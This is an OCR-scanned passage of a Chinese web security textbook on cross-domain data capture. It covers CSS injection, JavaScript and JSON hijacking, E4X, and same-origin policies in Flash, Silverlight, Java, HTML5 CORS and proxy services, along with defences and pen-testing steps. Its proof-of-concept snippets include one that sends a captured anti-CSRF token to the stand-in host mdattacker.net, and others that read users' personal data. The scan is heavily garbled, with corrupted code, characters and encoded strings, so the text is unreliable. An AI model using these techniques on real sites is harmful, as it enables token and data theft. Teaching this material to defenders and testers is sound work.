人 用 户 的 响应 中 显示 这 段 代 码 。 这 时 ， 返 回 给 用 户 的 响应 可 能 与 以 下 
内 容 类 似 : 


<title>wahhMail inbox</titie> 
</head> 


<body> 
<td>{}*{£Zont-family: '</cd> 


<form action="http: //wahh-mail.com/forwardemail" method="POST*"> 
<input type="hidden" name="nonce”* value="2230313740821"> 


oO 
<input type="submit" value="Forward"> 
</form> 


<SCrLpt> 


var _StatsTrackerTd='AAE78F27CB3210D'; 


</script> 
</boay> 


</html> 


很 明显 ， 此 啊 应 中 包含 HTML。 但 奇怪 的 是 ， 浏 览 器 将 该 响应 加 
载 为 CSS 样 式 表 ， 将 正常 处 理 其 中 包含 的 任何 CSS 定 义 。 在 这 段 代 码 
中 ， 注 入 的 响应 定义 了 CSS font-family 属 性 ， 并 将 一 个 引用 的 字符 串 
作为 属性 定义 。 攻 击 者 注入 的 文本 并 未 终止 该 字符 串 ， 因 此 ， 该 字符 
串 会 一 直 持 续 到 响应 的 剩余 部 分 ， 包 括 包含 敏感 的 反 CSRE 令 牌 的 隐藏 
表单 字段 。 (请 注意 ，CSS 定 义 不 需 要 被 引用 。 但 是 ， 如 果 没 有 3 引用 
CSS 定 义 ， 它 们 可 能 会 在 下 一 个 分 号 位 置 终 止 ， 而 该 分 号 可 能 出 现在 
攻击 者 希望 捕获 的 敏感 数据 之 前 。) 

要 利用 这 种 行为 ， 攻 击 者 需要 在 自己 的 域 中 创建 一 个 页 面 ， 在 其 
中 包含 CSS 样 式 表 形 式 的 注入 响应 。 这 会 在 攻击 者 自己 的 页 面 中 应 用 
任何 瞪 入 的 CSS 定 义 。 然 后 ， 攻 击 者 可 以 使 用 JavaScript 来 查询 这 些 定 
。 例如， 攻击 者 可 以 创建 一 个 包含 以 下 内 容 
JD : 


<link rel="stylesheet" href="https://wahħh-mail.com/inbox" type="text/ 


css"> 


<script> 
deocument.write{'<img sro="http://mdattacker.net/capture?' 
escape (document. body.currentStyle.fontFamily) + ' 


</script> 


此 页 面包 含 来 目 Web 邮 件 应 用 程序 的 表示 为 样式 表 的 相关 URL， 
并 运行 脚本 来 查询 font-family 属 性 ， 该 属性 已 在 Web 邮 件 应 用 程序 的 啊 
应 中 定义 。 然 后 ，font-family 属 性 的 值 ， 包 括 敏感 的 反 CSRF 令 牌 ， 将 
通过 针对 以 下 URL 的 、 动 态 生 成 的 请 求 传送 到 攻击 者 的 服务 器 中 : 


yrwardemal1l$22%20methodt3D%2 


itt ps k Š CO 2 = od%3D%22PC 2 
IASICinputs2 Ctypes3DS22hiddent22%2 0namet3D$22nonces22$20values3 


ZSSEVODSOABIC 

D%222230313740821%22%3E%0D %0A%3Cinput%20type%3D0D%22submit4%223%20value%3Dp9% 
22Forward$22%$3E%$0D$0A. ..$0D%L0A$3IC/ FormB3ESODSOA. ..$0D$0A$3Cscript$3E%0D 
$0Avar%20_StatsTrackerlIdtiDt27AAE7SF27CB32 10D%27 


此 攻击 可 在 当前 版 本 的 Internet Explorer 上 实施 。 为 防止 这 种 攻 
击 ， 其 他 浏览 器 已 修改 了 它们 处 理 CSS 的 方式 ， 将 来 IE 也 可 能 会 这 样 
做 。 


13.2.3 ”JavaScript 动 持 


JavaScript 动 持 提 供 了 另 一 种 跨 域 捕获 数据 的 方法 ， 从 而 将 CSRF 
转换 为 一 种 有 限 的 “双向 ”攻击 。 如 第 3 章 所 述 ， 同 源 策略 允许 一 个 域 包 
含 其 他 域 的 脚本 代码 ， 并 且 该 代码 可 以 在 调用 域 、 而 不 是 发 布 域 中 运 
行 。 只 要 可 执行 的 应 用 程序 响应 使 用 仅 包 含 非 敏感 代码 (可 由 任何 应 
用 程序 用 户 访 问 的 静态 代码 ) 的 跨 域 脚本 ， 这 种 规定 就 不 会 造成 危 
险 。 但 是 , 今天 的 许多 应 用 程序 都 使 用 JavaScript 来 传输 敏感 数据 ， 并 
且 其 传输 方式 并 不 受 同 源 策略 的 限制 。 此 外 ， 随 着 浏览 器 技术 的 发 
展 ， 许 多 语法 都 可 以 作为 有 效 的 JavaScript 执 行 ， 这 为 跨 域 捕获 数据 提 
供 了 新 的 机 会 。 

应 用 程序 设计 方面 的 变化 (归于 宽泛 的 “2.0” 概 念 ) 也 为 使 用 
JavaScript 从 服务 器 向 客户 端 传输 敏感 数据 提供 了 新 的 方法 。 许 多 时 
候 ， 要 通过 向 服务 器 提供 异步 请 求 更 新 用 户 界面 ， 一 种 快速 有 效 的 方 
法 ， 是 动态 插入 脚本 代码 ， 并 在 其 中 以 某 种 形式 包含 需要 显示 的 特定 
的 用 户 数 据 。 

在 这 一 节 中 ， 我 们 将 介绍 各 种 使 用 动态 执行 的 脚本 代码 来 传输 敏 
感 数 据 的 方法 。 同 时 ， 我 们 还 将 说 明 如 何 动 持 这 类 代码 ， 以 捕获 其 他 
域 中 的 数据 。 

1. BREW 

以 一 个 应 用 程序 为 例 ， 它 在 当前 用 户 单 击 相应 的 选项 卡 时 ， 在 用 

户 界面 中 显示 该 用 户 的 个 人 信息 。 为 提供 无 颖 的 用 户 体验 ， 应 用 程序 


使 用 异步 请 求 提 取 用 户 信息 。 当 用 户 单 击 * 个 人 资源 "选项 卡 时 ， 某 段 
客户 病 代 码 将 动态 包含 以 下 脚本 : 


https://mdsec.net/auth/420/YourDetailsJson.ashx 


ED ILURLAVIE I Ts Vel, VER EU ie AE 
料 。 


showUserInfo ( 


[ 
'Name', 'Matthew Adamson' ], 
'Username', ‘adammatt' ], 
'Password', ‘4nllub3' ], 
[ Pee, TRS Ty 
[ 'Role', 'User' ] 

lyi 

在 这 种 情况 下 ， 攻 击 者 可 以 创建 一 个 执行 showUserInfo 函 数 的 页 


面 ， 并 在 其 中 包含 传送 个 人 信息 的 脚本 ， 从 而 捕获 用 户 的 个 人 资源 。 
一 个 简单 的 概念 验证 攻击 如 下 所 示 : 


<script> 


function showUseriInfo(x) { alert(x); } 
</script> 
<script src="httos://mdsec.net/auth/420/YourDetailsJson.ashx"> 
</script> 


如 果 用 户 在 访问 攻击 者 的 页 面 的 同时 ， a 
应 用 程序 ， 则 攻击 者 的 页 面 将 动态 插入 包含 电 的 脚本 。 
ee a 
人 资料 ， 包 括 用 户 的 密码 (如 本 例 所 示 ) 。 


尝试 访问 


http://mdsec.net/auth/420/ 


2. JSON 


下 面 我 们 对 上 一 个 示例 稍 做 修改 ， 应 用 程序 将 不 再 在 动态 调用 的 
脚本 中 执行 画 数 回调 ， 而 是 返回 包含 用户 个 人 资料 的 JSON 数 组 : 


[ 


‘'Name', ‘Matthew Adamson' ], 
‘Username', '‘adammatt' ], 
‘Password', ‘'4nliub3' ], 
uidi "SE Ts 

‘Role', ‘User' | 


] 


如 第 3 草 所 述 ，JSON 是 一 种 灵活 的 数据 表示 形式 ， 并 且 可 以 由 
JavaScript 解 释 硕 直接 处 理 。 
在 旧版 本 的 Firefox 中 ， 攻 击 者 可 以 执行 一 次 跨 域 脚本 包含 攻击 ， 
A mm JavaScript FAY ERV Array tie EN BOR TH IK EAT o POU: 
can capture(s) { 
alert(s); 


function Array{) { 


tox (War z= OF a <-53 i++) 
this[i] setter = capture; 
</script> 
<script src=“https://mdsec.net/auth/409/YourDetailsJson.ashx*> 
</script> 


此 攻击 修改 默认 的 Array 对 象 ， 并 定义 一 个 定制 的 setter 函 数 (在 为 
数组 中 的 元 素 分 配 值 时 将 调用 该 画 数 ) 。 然 后 ， 它 执行 包含 JSON 数 据 


的 啊 应 。JavaScript 解 释 器 将 处 理 这 些 JSON 数 据 ， 构 造 一 个 Array 来 保 
存 它们 的 值 ， 并 对 数组 中 的 每 个 值 调 用 攻击 者 定制 的 setter 琴 数 。 

由 于 此 类 攻击 已 于 2006 年 被 发 现 ， 因 而 开发 者 已 对 Firefox 进 行 了 
修改 ， 以 防止 在 数据 初始 化 过 程 中 调用 定制 的 setter 函 数 。 此 攻击 无 法 
在 当前 版 本 的 浏览 絮 中 实施 。 


尝试 访问 


http://mdsec.net/auth/409/ 

要 利用 本 示例 ， 请 下 载 2.0 版 本 的 Firefox。 请 从 以 下 URL 下 载 该 
版 本 的 Firefox: 

www.oldapps.com/firefox.php?old_firefox=26 


3. 变量 分 配 

以 一 个 社交 网 络 应 用 程序 为 例 ， 该 应 用 程序 大 量 使 用 异步 请 求 来 
执行 各 种 操作 ， 如 更 新 状态 、 添 加 好 友和 发 布 评 论 。 为 提供 快速 无 颖 
的 用 户 体 验 ， 一 部 分 用 户 界面 使 用 动态 生成 的 脚本 加 载 。 
为 防止 标准 的 CSRF 攻 击 ， 这 些 脚 本 中 包含 了 反 CSRF 令 脾 ， 以 便 在 执 
行 敏 感 操 作 时 使 用 。 利 用 在 动态 脚本 中 插入 这 些 令 有 牌 导致 的 漏 润 ， 攻 
击 者 可 以 通过 跨 域 包含 相关 脚本 来 捕获 令 牌 。 

例如 ， 假 设 wahh-network.com 上 的 应 用 程序 返回 包含 以 下 代码 的 
脚本 : 


var nonce = '222230313740821'; 


一 个 用 于 跨 域 捕获 nonce 值 的 简单 概念 验证 攻击 如 下 所 示 : 
<script src="https://wahh-network.com/status"> 
</script> 
<script> 

alert (nonce); 
</script> 


FEAT PAB, SIETE KA tT A: 


function setStatus (status) 


{ 
nonce = '222230313740821'; 


} 
这 时 ， 攻 击 者 可 以 实施 以 下 攻击 : 


<script src="https://wahh-network.com/status"> 
</script> 
<script> 
setStatus('a'); 
alert (nonce); 
</script> 


针对 不 同 的 变量 分 配 情形 ， 攻 击 者 可 以 采用 各 种 其 他 技巧 。 在 某 
些 情况 下 ， 攻 击 者 可 能 需要 在 一 定 程度 上 模仿 目标 应 用 程序 的 客户 端 
逻辑 ， 才 能 包含 该 程序 的 部 分 脚本 并 捕获 敏感 数据 。 
4. E4X 

就 在 不 久之 前 ，E4X 成 为 一 个 快速 发 展 的 领域 ， 为 应 对 在 各 种 实 
0 
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E4X 是 对 ECMAScript 语 言 (包括 JavaScript) 的 扩展 ， 后 者 可 为 
XML 语言 添加 本 地 支持 。 目 前 ， 当 前 版 本 的 Firefox 浏 览 器 已 实施 了 
E4X。 尽 管 其 中 的 漏洞 已 经 修复 ， 但 Firefox 在 E4X 的 处 理 方 式 上 仍 存 
在 漏洞 ， 可 用 于 跨 域 捕获 数据 。 

除了 人 允许 在 JavaScript 中 直接 使 用 XML 语法 外 ， 用 户 还 可 以 在 E4X 
先入 代码 ， 以 调用 XML 中 的 JavaScript: 


var foo=<bar>{prompt {'Please enter the value of bar.')}</bar>; 

E4X 的 这 些 特性 导致 了 两 个 严重 的 后 果 ， 可 用 于 实施 跨 域 数据 捕 
获 攻 击 : 

口 结构 正确 的 XML 标记 将 被 视 为 不 会 分 配给 任何 变量 的 值 ; 


口 散 入 {...} 块 中 的 文本 将 作为 JavaScript 执 行 ， 用 于 对 XML 数 据 的 
相关 部 分 进行 初始 化 。 

许多 结构 正确 的 HTML 也 是 结构 正确 的 XML， 意 味 着 它们 可 以 由 
E4X 进 行 处 理 。 此 外 ， 许 多 HTML 都 在 {...} 块 中 包含 提供 敏感 数据 的 
脚本 代码 。 例 如 : 


<html> 
<head> 


<script> 


function setNonce() 
{ 
nonce = '222230313740821'; 


} 


</seript> 
</head> 
<body> 


</body> 

</html> 

在 早期 版 本 的 Firefox 中 ， 攻 击 者 可 以 对 类 似 于 上 面 的 完整 HTML 
啊 应 执行 跨 域 脚本 包含 ， 并 在 上 自己 的 域 中 执行 一 些 租 入 式 JavaScript 代 
i o 

此 外 ， 利 用 与 之 前 所 述 的 CSS 注 入 攻击 类 似 的 技巧 ， 攻 击 者 有 时 
可 以 在 目标 应 用 程序 的 HTML 了 别 应 中 的 适当 位 置 注入 文本 ， 在 该 啊 应 
中 的 敏感 数据 周围 插入 任意 的 {...} 块 。 然 后 ， 攻 击 者 可 以 跨 域 包含 整 
个 响应 ， 将 其 作为 脚本 执行 ， 以 捕获 其 中 包含 的 数据 。 

上 述 任 何 一 种 攻击 都 可 以 在 当前 版 本 的 浏览 器 中 实施 。 随 着 这 个 
过 程 不 断 继续 ， 浏 览 器 对 于 最 新 语法 结构 的 支持 也 进一步 扩展 ， 在 新 
的 浏 贤 锅 功能 推出 之 前 ， 针 对 不 易于 受到 上 述 攻 击 的 应 用 程序 ， 很 可 
能 会 出 现 新 型 跨 域 数 据 捕获 攻击 。 


5. 防止 JavaScript 动 持 

实施 JavaScript 动 持 攻 击 必须 满足 几 个 前 提 条 件 。 因 此， 要 防止 这 
种 攻击 ， 必 须 违 反 其 中 至 少 一 个 前 提 条 件 。 要 获得 深层 保护 ， 我 们 建 
议 在 防御 攻击 时 同时 采用 多 种 防范 措施 。 

口 至 于 执行 敏感 操作 的 请 求 ， 应 用 程序 应 使 用 标准 的 反 CSRF 防 御 
来 阻止 跨 域 请 求 返 回 任何 包含 敏感 数据 的 响应。 

口 当 应 用 程序 从 它 目 己 的 域 中 动态 执行 JavaScript 代 码 时 ， 并 不 仅 
限于 使 用 <script> 标 签 来 包含 脚本 。 因 为 请 求 为 本 站 请 求 ， 客 户 端 代码 
可 以 使 用 XMLHttpRequest 检 索 原 始 啊 应 并 进行 其 他 处 理 ， 然 后 再 将 其 
作为 脚本 执行 。 这 意味 着 ， 应 用 程序 可 以 在 响应 的 开始 部 分 插入 无 效 
或 有 问题 的 JavaScript， 客 户 端 应 用 程序 在 处 理 脚本 前 ， 将 会 删除 这 些 
内 容 。 例 如 ， 以 下 脚本 在 使 用 脚本 包含 执行 时 将 导致 无 限 循环 ， 但 如 
采 使 用 XMLHttpRequest 访 问 ， 则 可 以 在 执行 之 前 删除 ; 
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口 由 于 应 用 程序 可 以 使 用 XMLHttpRequest 检 索 动 态 脚 本 ， 因 此 它 
也 可 以 使 用 POST 请 求 完 成 这 个 任务 。 如 果 应 用 程序 仅 接受 使 用 POST 
请 求 访问 可 能 易 受 攻击 的 脚本 代码 ， 它 就 能 够 阻止 第 三 方 站 点 将 它们 
包含 在 <script> 标 签 内 。 


在 本 章 和 前 一 章 中 ， 我 们 介绍 了 如 何 将 同 源 策略 应 用 于 HTML 和 
Javascript 的 大 量 示例 ， 以 及 利用 应 用 程序 漏洞 和 浏览 器 怪癖 突破 这 种 
策略 的 各 种 方式 。 为 进一步 了 解 同 源 策 略 对 于 Web 应 用 程序 安全 的 重 
要 性 ， 我 们 将 在 这 一 节 中 介绍 其 他 一 些 适用 该 策略 的 情形 ， 以 及 这 些 


情形 如 何 会 导致 某 些 跨 域 攻击 。 


各 种 广 沁 部 署 的 浏 咒 器 扩展 技术 全 部 在 域 之 间 实 施 了 某 种 隔离 ， 
这 种 隔离 的 实施 方式 与 主要 的 浏览 套 同 产 策 略 所 采用 的 基本 原则 相 
同 。 但 是 ， 每 种 实施 方式 的 一 些 特点 在 某 些 情况 下 可 能 会 导致 路 域 攻 
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1. 同 源 策略 与 Flash 

Flash 对 象 的 来 源 由 加 载 这 些 对 象 的 URL 所 在 的 域 决定 ， 而 不 是 由 
加 载 这 些 对 象 的 HTML 页 面 的 URL 决 定 。 和 浏览 器 中 的 同 源 策略 一 
样 ， 默 认 情 况 下 ， 将 基于 协议 、 主 机 名 和 端口 号 实施 隔离 。 

除 与 同一 来 源 进行 完全 双 同 交互 外 ，Flash 对 象 还 可 以 通过 浏览 右 
使 用 URLRequest API 提 出 跨 域 请 求 。 与 纯粹 的 浏 顺 右 技 术 相 比 ， 以 这 
种 方式 提出 请 求 可 以 对 请 求实 施 更 进一步 的 控制 ， 如 能 够 指定 任意 的 
Content-Type 消 息 头 及 在 POST 请 求 主 体 中 发 送 任意 内 容 。 将 对 这 些 请 
求 应 用 浏 砚 恬 cookie， 但 默认 情况 下 ， 提 出 这 些 请 求 的 Flash 对 象 并 不 
能 读 取 对 跨 源 请 求 做 出 的 啊 应 。 

Flash 提 供 了 一 种 机 制 ， 各 种 域 可 通过 这 种 机 制 向 来 自 其 他 域 的 
Flash 对 和 象 授 予 权 限 ， 以 便于 这 些 对 象 与 它们 进行 完全 双 问 的 交互 。 通 
和 常 ， 授 予 权 限 的 域 会 在 URL /crossdomain.xml 处 发 布 一 个 策略 文件 ， 从 
而 完成 这 一 任务 。 当 某 个 Flash 对 象 和 尝试 提 出 双 辣 跨 域 请 求 时 ，Flash 济 
哆 絮 扩 展 将 检索 所 请 求 的 域 中 的 策略 文件 ， 并 仪 在 所 请 求 的 域 授权 对 
提出 请 求 的 域 的 访问 权限 时 ， 才 允许 上 壕 请 求 。 

由 www.adobe.com 发 布 的 Flash 寅 略 文件 如 下 所 示 : 


<?xml version="1.0"?> 
<cross-domain-peolicy> 
<site-control permitted-cross-domain-policies="by-content-type"/> 
<allow-access-from domain="*.macromedia.com" /> 
<allow-access-from domain="*.adobe.com* /> 
<allow-access-E£rom domain="*.ohotoshep.com" /> 
<allow-access-from domain="*.acrobat.com" /> 
</cross-domain-policy> 


渗透 测试 步骤 


测试 员 应 始终 检查 所 测试 的 任何 Web 应 用 程序 中 
的 /crossdomain.xml 文 件 。 即 使 应 用 程序 本 号 不 使 用 Flash， 但 如 果 回 
男 一 个 域 授予 权限 ， 则 由 该 域 发 布 的 Flash 对 象 将 可 以 与 发 布 策略 的 
域 进行 交互 。 

口 如 果 应 用 程序 允许 无 限制 访问 (通过 指定 <allow-access-from 
domain=“*”/>) ， 则 任何 其 他 站 点 均 可 以 执行 双 同 交互 ， 从 而 控制 


应 用 程序 用 户 的 会 话 。 这 样 ， 其 他 域 殴 可 以 检索 全 部 数据 ， 并 执行 
任何 用 户 操 作 。 

口 如 果 应 用 程序 可 以 访问 同一 组 织 使 用 的 子 域 或 其 他 域 ， 则 这 
些 域 当然 可 以 与 应 用 程序 进行 双 同 交互 。 这 意味 着， 攻击 者 可 以 利 
用 这 些 域 上 的 XSS 等 漏洞 来 攻破 授予 权限 的 域 。 此外， 如 果 攻 击 者 
能 够 在 任何 域 上 购买 基于 Flash 的 广告 ， 就 可 以 使 用 其 部 署 的 Flash 对 
象 来 攻破 授予 权限 的 域 。 
? M 0 0 或 其 他 可 能 对 攻击 者 有 用 
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此 外 ， 需 要 注意 的 是 ，Flash 对 象 可 能 会 在 应 从 中 下 载 策略 文件 的 
目标 服务 器 上 指定 一 个 URL。 如果 默 认 位 置 没 有 顶级 策略 文件 ，Flash 
浏 哆 器 会 尝试 从 该 指定 的 URL 处 下 载 策 略 文件 。 对 此 URL 的 响应 必须 
包含 格式 有 效 的 案 上 略 文 件 ， 并 必须 在 Content-Type 消 息 头 中 指定 一 种 
XML 或 基于 文本 的 MIME 类 型 ， 才 能 得 到 处 理 。 当 前 ， 网 络 上 的 大 多 
数 域 都 没有 在 /crossdomain.xml 位 置 发 布 Flash 策 略 文 件 ， 这 可 能 基于 以 
下 假设 : 在 没有 策略 的 情况 下 ， 默 认 行为 是 禁止 任何 跨 域 访 问 。 但 
是 ， 这 一 假设 忽略 了 第 三 方 Flash 对 和 象 指 定 用 于 下 载 俩 略 的 定制 URL 的 
可 能 性 。 如 果 应 用 程序 包含 任何 功能 ， 可 被 攻击 者 用 于 在 应 用 程序 域 
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2. 同 源 策略 与 Silverlight 
用 于 Silverlight 的 同 源 策略 在 很 大 程度 上 基于 由 Flash 实 施 的 策略 。 
Silverlight 对 象 的 来 源 由 加 载 这 些 对 象 的 URL 所 在 的 域 决 是 ， 而 不 是 由 


加 载 这 些 对 象 的 HTML 页 面 的 URL 决 定 。 

Silverlight 与 Flash 的 一 个 重要 区 别 在 于 ，Silverlight 不 会 基于 协议 
或 端口 隔离 来 源 ， 因 此 通过 HTTP 加 载 的 对 象 可 以 与 同一 域 上 的 
HTTPS URLI E. ° 

Silverlight 使 用 目 己 的 路 域 策 略 文件 ， 地 址 
为 /clientaccesspolicy.xml。 由 www.microsoft.com 发 布 的 Silverlight 策 略 
文件 如 下 所 示 : 


<?xml version="1.0" encoding="utf-8"?> 
<access-policy> 
<cross-domain-access> 
<policy> 
<allow-from > 


<domain uri="http://www.microsoft.com"/> 


wn 
<domain uri="http://i.microsoft.com"/> 
<domain uri="http://i2.microsoft.com"/> 
<domain uri="http://i3.microsoft.com"/> 
<domain uri="http://i4.microsoft.com"/> 
<domain uri="“http://img.microsoft.com"/> 
</allow-from> 
<grant-to> 
<resource path="/" include-subpaths="true"/> 
</grant-to> 
</policy> 
</cross-domain-access> 
</access-policy> 


上 面 介绍 的 针对 Flash 跨 域 党 略 文件 的 注意 事项 同样 适用 于 
Silverlight， 但 是 ，Silverlight 不 允许 对 象 为 策略 文件 指定 非 标 准 的 
URL ° 
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试 从 默认 位 置 加 载 有 效 的 Flash 策 略 文件 。 不 过 ， 如 果 存 在 策略 文件 ， 
则 扩展 会 处 理 该 文件 。 

3. 同 源 策略 与 Java 
Java 在 来 源 之 间 实 施 隔离 ， 它 实施 隔离 的 方式 在 很 大 程度 上 基于 
浏 宽 絮 的 同 源 策 略 。 和 其 他 浏 贤 絮 扩展 一 样 ，Java applet 对 象 的 来 源 由 


加 载 这 些 对 象 的 UREL 所 在 的 域 决 定 ， 而 不 是 由 加 载 这 些 对 象 的 HTML 
页 面 的 URL 决 定 。 

Java 同 源 策略 的 一 个 重要 不 同 在 于 : 某 些 情况 下 ， 与 来 源 域 共享 
IP 地 址 的 其 他 域 将 被 视 为 “ 同 源 *。 在 某 些 共享 主机 的 情况 下 ， 这 可 能 
会 导致 一 定 程度 的 跨 域 交互 。 

当前 ，Java 并 不 限制 一 个 域 发 布 允许 与 其 他 域 进行 交互 的 策略 。 


13.3.2 同 源 策略 与 HTML5 


按照 最 初 的 设计 ，XMLHttpRequest 仅 允许 同 与 调用 页 面 的 来 源 相 
同 的 来 源 提出 请 求 。 随 着 HTML5 的 出 现 ， 这 一 技术 已 得 以 修改 ， 从 而 
可 以 与 其 他 域 进行 双 疝 交互 ， 前 提 是 被 访问 的 域 为 交互 提供 权限 。 

跨 域 交互 的 权限 通过 一 系列 新 的 HTTP 消 息 头 来 实现 。 如 果 某 个 脚 
本 壬 试 使 用 XMLHttpRequest 提 出 跨 域 请 求 ， 处 理 该 请 求 的 方式 将 因 请 
求 的 具体 内 容 而 异 。 

口 对 于 “和 常规” 请求， 即 可 以 使 用 现 有 的 HTML 结 构 跨 域 生成 的 请 
求 ， 浏 哆 器 将 提出 请 求 ， 并 检查 生成 的 响应 消 恩 头 ， 以 确定 是 否 应 人 允 
许 调 用 脚本 访问 该 请 求 的 响应 。 

口 其 他 无 法 使 用 现 有 的 HTML 生 成 的 请 求 ， 如 那些 使 用 非 标准 
HTTP 方 法 或 Content-Type、 或 添加 了 定制 HTTP 消 息 尖 的 请 求 ， 将 进行 
不 同 处 理 。 浏 览 絮 会 首先 癌 目标 URL 提 出 一 个 OPTIONS 请 求 ， 然 后 检 
查 啊 应 消息 头 ， 以 确定 是 否 应 允许 那些 请 求 。 

在 上 述 两 种 情况 下 ， 浏 贤 器 都 会 添加 一 个 Origin 消 息 头 ， 用 于 指 
示 笑 试 提出 跨 域 请 求 的 域 。 


Oxigin: http: //wahh-app. com. 


要 确定 可 能 执行 双 癌 交互 的 域 ， 服务器 的 啊 应 中 应 包含 Access- 
Control-Allow-Origin 消 息 涉 ， 其 中 包括 以 逗号 分 隔 的 允许 的 域 列表 和 
通配符 : 


Access-Cornlrol-Allow-Ocicgin: ， 
在 第 二 种 情况 下 ， 如 果 已 使 用 OPTIONS 请 求 预 先 验证 了 跨 域 请 
求 ， 则 可 以 使 用 以 下 消息 头 来 指示 尝试 提出 的 请 求 的 具体 内 容 : 
Access-Contzxo9l-Request-Method: FUT 
Access Cont> ol Request Headers: X PTNGOTHFR 


为 啊 应 OPTIONS 请 求 ， 服 务 器 可 以 使 用 以 下 消 恩 头 来 指定 允许 提 
出 的 跨 域 请 求 的 类 型 : 


Access-Control-Allow-Origin: http://wahh-app.com 
Access-Control-Allow-Methods: POST, GET, OPTIONS 
Access-Control-Allow-Headers: X-PINGOTHER 
Access-Control-Max-Age: 1728000 


渗透 测试 步骤 


(1) 要 测试 应 用 程序 如 何 使 用 XMLHttpRequest 处 理 跨 域 请 
求 ， 测 试 员 应 笑 试 添加 一 个 用 于 指定 其 他 域 的 Origin 消 恩 尖 ， 并 检 


查 返 回 的 任何 Access-Control 消 轧 头 。 人 允许 任何 域 或 指定 的 其 他 域 进 
行 双 网 访问 导致 的 安全 隐患 邱 上 述 Flash 跨 域 策 略 导致 的 安全 隐患 相 


同 
(2) 如 果 有 任何 跨 域 访问 受到 支持 ， 则 测试 员 还 应 使 用 
OPTIONS 请 求 来 了 解 到 底 允 许 哪些 消 电 头 和 其 他 请 求 。 


除 可 能 允许 外 部 域 进行 双 同 交互 外 ，XMLHttpRequest 的 新 特性 还 
可 能 导致 利用 Web 应 用 程序 的 特定 功能 的 新 型 攻击 ， 或 新 型 常规 攻 
击 o 

如 第 12 章 所 述 ， 一 些 应 用 程序 使 用 XMLHttpRequest 回 在 URL 参 数 
中 、 或 在 片断 标识 符 后 指定 的 文件 提出 异步 请 求 。 检 索 到 的 文件 动态 
加 载 到 当前 页 面 的 <div> 中 。 由 于 以 前 不 可 能 使 用 XMLHttpRequest 提 
出 里 域 请 求 ， 因 此 也 没有 必要 验证 所 请 求 的 项 目 是 否 在 应 用 程序 自生 
的 域 上 。 利 用 新 版 本 的 XMLHttpRequest， 攻 击 者 可 以 在 其 控制 的 域 上 
指定 一 个 URL， 从 而 对 应 用 程序 用 户 实施 客户 并 远程 文件 包含 攻击 。 

更 常见 的 是 攻击 者 可 以 借助 XMLHttpRedquest 的 新 特性 ， 利 用 恶意 
或 被 攻破 的 网 站 ， 通 过 访问 网 站 用 户 的 浏览 器 来 实施 攻击 ， 即 使 这 时 
器 域 访问 已 遭 到 禁止 。 跨 域 剖 口 扫描 表明 ， 使 用 XMLHttpRequest 党 试 
问 任 意 主 机 和 端口 提出 请 求 ， 并 观察 啊 应 的 时 间 差 异 ， 可 以 推 新 所 请 
求 的 端口 是 否 已 打开 、 关 闭 或 被 过 滤 。 此 外 ， 与 传统 的 生成 路 域 请 求 
的 方法 相 比 ， 使 用 XMLHttpRequest 可 以 更 快速 地 实施 分 布 式 拒绝 服务 
攻击 。 如 采 目 标 应 用 程序 禁止 跨 域 访问 ， 则 需要 在 URL 参 数 中 增加 一 
个 值 ， 以 确保 每 个 请 求 针 对 不 同 的 URL， 因 此 实际 上 由 浏览 器 提出 。 


13.3.3 ”通过 代理 服务 应 用 程 


一 些 公 开发 布 的 Web 应 用 程序 提供 高 效 的 代理 服务 功能 ， 人 允许 从 
不 同 域 检索 内 容 ， 但 服务 于 代理 Web 应 用 程序 中 的 用 户 。Google 翻 译 


(GT) 束 是 一 个 典型 的 例子 ， 它 可 以 请 求 指 定 的 外 部 URL 并 返回 其 内 
容 ， 如 图 13-2 所 示 。 《虽然 翻译 引擎 可 能 会 修改 检索 到 的 响应 中 的 文 
本 ,但 基本 的 HTML 标 记 和 任何 脚本 代码 仍 保持 不 变 。) 
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113-2 Google 翻译 可 请 求 外 部 URL， 并 返回 其 内 容 ， 响 应 中 的 文本 将 被 翻译 成 指 


定 的 语言 


如 果 两 个 不 同 的 外 部 域 均 通过 GT 应 用 程序 访问 ， 这 时 可 能 会 一 个 
有 趣 的 问题 。 这 种 情况 下 ， 在 浏览 右 看 来 ， 来 目 每 个 外 部 域 的 内 容 将 
往 留 在 GT 域 中 ， 因 为 这 是 浏览 禹 从 中 检索 内 容 的 域 。 虽 然 两 组 内 容 均 
驻 留 在 同一 个 域 中 ， 它 们 之 间 可 以 进行 双 疝 交互 《如果 这 种 交互 也 通 
过 GT 域 实施 的 话 ) 。 

当然 ， 如 采用 户 登 录 某 个 外 部 应 用 程序 ， 然 后 通过 GT 访问 该 应 用 
程序 ， 则 该 用 户 的 浏 咒 器 会 正确 地 将 GT 视 为 其 他 域 。 因 此， 用 户 用 于 
外 部 应 用 程序 的 cookie 将 不 会 通过 GT 在 请 求 中 发 送 ， 并 且 也 不 可 能 进 
行 任何 其 他 交互 。 同 样 ， 恶 意 网 站 也 无 法 利用 GT 轻松 攻破 其 他 应 用 程 
FEMA RP S18 ° 

但 是 ， 网 站 可 以 利用 GT 等 代理 服务 行为 与 位 于 其 他 域 上 的 应 用 程 
序 的 公开 、 林 授权 的 区 域 进行 双 癌 交互 。Jikto 吕 是 这 样 的 一 种 攻击 。 
Jikto 是 一 个 概念 验证 蠕虫 ， 通 过 在 Web 应 用 程序 中 查找 并 利用 永久 性 


XSS 漏 洞 ， 从 而 在 应 用 程序 之 间 进 行 传 播 。Jikto 代 码 的 基本 运行 机 制 
UR ° 


口 初 次 运行 时 ， 该 脚本 会 检查 其 是 否 在 GT 域 中 运行 。 如 果 不 是 ， 
它 会 通过 GT 域 加 载 当 前 URL， 从 而 将 自己 传送 到 GT 域 中 。 
o 该 脚本 通过 GT 请 求 外 部 域 中 的 内 容 。 由 于 该 脚本 自身 在 GT 域 
中 运行 ， 它 可 以 通过 GT 与 任何 其 他 域 上 的 公开 内 容 进 行 双 向 交互 。 
口 该 脚本 以 JavaScript 实 现 一 个 基本 的 web 扫描 程序 ， 在 外 部 域 中 
条 查 永 久 性 XSS 漏 洞 。 公 告 牌 等 可 以 公开 访问 的 功能 中 可 能 存在 这 类 
漏洞 。 

> ne 该 脚本 将 利用 此 漏洞 将 它 的 一 个 副本 加 载 
到 外 部 域 中 。 

o 其 他 用 户 访问 被 攻破 的 外 部 域 时 ， 该 脚本 开始 执行 ， 并 且 这 个 
过 程 会 不 断 自动 重复 。 

Jikto 蠕 虫 会 设法 利用 XSS 漏 洞 来 传播 自己 。 但 是 ， 这 种 通过 代理 
服务 合并 域 的 基本 攻击 技巧 并 不 取决 于 所 针对 的 单个 外 部 应 用 程序 中 
